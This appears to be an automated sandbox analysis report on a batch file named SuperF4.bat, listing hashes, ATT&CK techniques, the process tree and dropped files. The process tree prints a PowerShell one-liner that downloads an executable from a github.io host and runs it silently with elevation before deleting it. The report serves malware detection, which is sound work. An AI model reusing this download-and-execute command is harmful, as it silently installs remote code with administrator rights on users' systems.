4b9e4bbd675a45f1a99d54bff55576ba3c6d79ab76ea30e143d89fc1543e8580

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 06:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Files/Apps/SuperF4.bat
Size

534B
MD5

561400dc8a63d4b4cc87cabac9e8422a
SHA1

69502ed43cf6e495c060fac70a5ef37f4f15ca53
SHA256

767bccd41110d92c69bba5aaceea296f7e0b61fd1f9e09a3fa1ed08e8a8b8282
SHA512

8c3efaedb0c9d7bc9de04dbe0d9c2b7a33b2b40a2f0836e719aabdf6197d2c4cdeece3b5eb0276f3484236dc99b797d63324ababa5dd1d4220af693910f12046

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 4232 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4232 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

SuperF4.exeSuperF4.exe

pid process

4180 SuperF4.exe
636 SuperF4.exe
Loads dropped DLL 3 IoCs

Processes:

SuperF4.exe

pid process

4180 SuperF4.exe
4180 SuperF4.exe
4180 SuperF4.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

SuperF4.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SuperF4.exe

flow	pid	process
7	4232	powershell.exe

pid	process
4232	powershell.exe

pid	process
4180	SuperF4.exe
636	SuperF4.exe

pid	process
4180	SuperF4.exe
4180	SuperF4.exe
4180	SuperF4.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SuperF4.exe

NSIS installer 1 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\SuperF4.exe	nsis_installer_2

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4232 powershell.exe
4232 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4232 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

SuperF4.exe

pid process

636 SuperF4.exe
636 SuperF4.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

SuperF4.exe

pid process

636 SuperF4.exe
636 SuperF4.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

SuperF4.exe

pid process

636 SuperF4.exe

pid	process
4232	powershell.exe
4232	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4232	powershell.exe

pid	process
636	SuperF4.exe
636	SuperF4.exe

pid	process
636	SuperF4.exe
636	SuperF4.exe

pid	process
636	SuperF4.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

cmd.execmd.exepowershell.exeSuperF4.exe

description	pid	process	target process
PID 1844 wrote to memory of 448	1844	cmd.exe	cmd.exe
PID 1844 wrote to memory of 448	1844	cmd.exe	cmd.exe
PID 1844 wrote to memory of 2592	1844	cmd.exe	cmd.exe
PID 1844 wrote to memory of 2592	1844	cmd.exe	cmd.exe
PID 2592 wrote to memory of 2732	2592	cmd.exe	chcp.com
PID 2592 wrote to memory of 2732	2592	cmd.exe	chcp.com
PID 1844 wrote to memory of 4084	1844	cmd.exe	chcp.com
PID 1844 wrote to memory of 4084	1844	cmd.exe	chcp.com
PID 1844 wrote to memory of 3340	1844	cmd.exe	chcp.com
PID 1844 wrote to memory of 3340	1844	cmd.exe	chcp.com
PID 1844 wrote to memory of 4232	1844	cmd.exe	powershell.exe
PID 1844 wrote to memory of 4232	1844	cmd.exe	powershell.exe
PID 4232 wrote to memory of 4180	4232	powershell.exe	SuperF4.exe
PID 4232 wrote to memory of 4180	4232	powershell.exe	SuperF4.exe
PID 4232 wrote to memory of 4180	4232	powershell.exe	SuperF4.exe
PID 4180 wrote to memory of 636	4180	SuperF4.exe	SuperF4.exe
PID 4180 wrote to memory of 636	4180	SuperF4.exe	SuperF4.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Files\Apps\SuperF4.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2592
- - C:\Windows\system32\chcp.com
    chcp
    3⤵
    PID:2732
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4084
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "& { $Path = $env:TEMP; $Installer = 'SuperF4.exe'; Invoke-WebRequest 'https://schooicodes.github.io/file_hosting/SuperF4.exe' -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -ArgumentList '/silent', '/install' -Verb RunAs -Wait; Remove-Item $Path\$Installer }"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4232
- - C:\Users\Admin\AppData\Local\Temp\SuperF4.exe
    "C:\Users\Admin\AppData\Local\Temp\SuperF4.exe" /silent /install
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Users\Admin\AppData\Roaming\SuperF4\SuperF4.exe
      C:\Users\Admin\AppData\Roaming\SuperF4\SuperF4.exe
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SuperF4.exe

Filesize
137KB

MD5
913e0bdc0124f415b1e99bc7c1a2e31b

SHA1
00a443e70039641d1ea3dc92c306c4e2c75733ad

SHA256
dea3dcae56acabada707a1c3ee0422fefa1f280aa3ca2c28c52714e16db060d2

SHA512
ba0257002023ae1b575356000cfcb96dafa5ca3bdea489872218508987397e62162862ef0ecd9713d579452a0a56d2988e5b9efd2566fc54f60ff94c14e5ede8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m11prrat.nge.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsdCDE1.tmp\System.dll

Filesize
23KB

MD5
8643641707ff1e4a3e1dfda207b2db72

SHA1
f6d766caa9cafa533a04dd00e34741d276325e13

SHA256
d1b94797529c414b9d058c17dbd10c989eef59b1fa14eea7f61790d7cfa7fd25

SHA512
cc8e07395419027914a6d4b3842ac7d4f14e3ec8be319bfe5c81f70bcf757f8c35f0aaeb985c240b6ecc71fc3e71b9f697ccda6e71f84ac4930adf5eac801181

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsdCDE1.tmp\nsDialogs.dll

Filesize
11KB

MD5
79a0bde19e949a8d90df271ca6e79cd2

SHA1
946ad18a59c57a11356dd9841bec29903247bb98

SHA256
8353f495064aaf30b32b02f5d935c21f86758f5a99d8ee5e8bf8077b907fad90

SHA512
2a65a48f5dd453723146babca8d047e112ab023a589c57fcf5441962f2846a262c2ad25a2985dba4f2246cdc21d973cbf5e426d4b75dd49a083635400f908a3e

Download Submit
C:\Users\Admin\AppData\Roaming\SuperF4\SuperF4.exe

Filesize
39KB

MD5
00549b9467a142cb8f46d12353c1fc9e

SHA1
dbe73a6f07cdb1cc48e55eca5fe6b9f12a5eeb30

SHA256
3c83c8dfe3fb718c175c7444837c938a32af6a24572a9a3405fae217fa771941

SHA512
a396c49d4c6b520bdd7a8e8d2410e4d95d2b011d7015642235d3a2a3bb5d98966e02d1174c94442957b231c389055abbe6ae08df565ed9b0d069606758896bc0

Download Submit
C:\Users\Admin\AppData\Roaming\SuperF4\SuperF4.ini

Filesize
1KB

MD5
5ae61c41ad72f1e4ded836254f1eb0f2

SHA1
e6997d630c8a72fcc843a49488f66e0b7b579653

SHA256
463f4d2f430d9ae4de8e26a39618846088cba3e0cc51413a9ac585e3b5fb461b

SHA512
789ce0ea56dded0d9bfa7cb3c82cd65cda64ac3aad8c69ecc7648785cd47bfa37a5faab939615acea729c0973f04662cb7c561789cd68b5f03a638c74b28ecc1

Download Submit
memory/636-64-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4180-49-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4180-63-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4180-51-0x000000006EB40000-0x000000006EB4A000-memory.dmp

Filesize
40KB

Download
memory/4180-50-0x000000006E5C0000-0x000000006E5CD000-memory.dmp

Filesize
52KB

Download
memory/4232-12-0x00007FF856160000-0x00007FF856C21000-memory.dmp

Filesize
10.8MB

Download
memory/4232-47-0x00007FF856160000-0x00007FF856C21000-memory.dmp

Filesize
10.8MB

Download
memory/4232-46-0x00007FF856160000-0x00007FF856C21000-memory.dmp

Filesize
10.8MB

Download
memory/4232-45-0x00007FF856163000-0x00007FF856165000-memory.dmp

Filesize
8KB

Download
memory/4232-0-0x00007FF856163000-0x00007FF856165000-memory.dmp

Filesize
8KB

Download
memory/4232-11-0x00007FF856160000-0x00007FF856C21000-memory.dmp

Filesize
10.8MB

Download
memory/4232-1-0x000001EDFEC60000-0x000001EDFEC82000-memory.dmp

Filesize
136KB

Download